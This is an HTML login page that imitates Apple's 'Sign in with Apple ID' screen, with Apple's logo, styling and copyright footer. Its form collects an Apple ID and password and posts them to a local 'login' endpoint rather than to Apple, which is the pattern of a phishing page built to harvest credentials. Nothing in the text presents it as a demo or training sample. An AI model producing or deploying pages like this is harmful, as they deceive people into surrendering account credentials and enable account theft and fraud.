<!DOCTYPE html>
<html>
<head>
      <meta charset="utf-8"/>
  <title>Sign in - Apple ID</title>
  <style>
    body {background:#e8e8ea;font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,sans-serif;}
    .box {max-width:330px;margin:90px auto;padding:40px;background:#fff;border-radius:12px;box-shadow:0 6px 24px #3333;}
    img {display:block;margin:0 auto 10px auto;}
    h2 {font-size:23px;text-align:center;font-weight:400;}
    input {width:100%;padding:9px;margin:11px 0 18px 0;border:1px solid #bbb;border-radius:2px;}
    button {width:100%;background:#0071e3;color:#fff;border:none;border-radius:7px;font-size:16px;padding:10px;}
    .foot {text-align:center;font-size:smaller;color:#aaa;margin-top:10px;}
  </style>
</head>
<body>
  <div class="box">
    <img src="https://appleid.cdn-apple.com/appleid/static/images/sign-in-with-apple-logo.png" width="60">
    <h2>Sign in with Apple ID</h2>
    <form method="POST" action="login">
      <input type="text" name="username" placeholder="Apple ID" required>
      <input type="password" name="password" placeholder="Password" required>
      <button type="submit">Sign in</button>
    </form>
    <div class="foot">© 2024 Apple Inc.</div>
  </div>
</body>
</html>
